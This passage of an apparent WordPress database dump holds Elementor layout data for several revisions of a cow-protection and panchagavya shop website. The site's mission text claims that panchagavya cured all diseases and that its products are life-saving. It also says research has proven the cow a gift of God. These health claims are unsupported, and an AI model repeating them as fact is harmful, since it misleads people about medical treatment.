l\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11624,1929,'_elementor_page_assets','a:0:{}'),(11627,1930,'_elementor_edit_mode','builder'),(11628,1930,'_elementor_template_type','wp-page'),(11629,1930,'_elementor_version','3.7.8'),(11630,1930,'_wp_page_template','elementor_canvas'),(11631,1930,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK-COIN-2.0.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11632,1930,'_elementor_page_assets','a:0:{}'),(11634,1931,'_elementor_edit_mode','builder'),(11635,1931,'_elementor_template_type','wp-page'),(11636,1931,'_elementor_version','3.7.8'),(11637,1931,'_wp_page_template','elementor_canvas'),(11638,1931,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK-COIN-2.0.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11639,1931,'_elementor_page_assets','a:0:{}'),(11641,1932,'_elementor_edit_mode','builder'),(11642,1932,'_elementor_template_type','wp-page'),(11643,1932,'_elementor_version','3.7.8'),(11644,1932,'_wp_page_template','elementor_canvas'),(11645,1932,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we 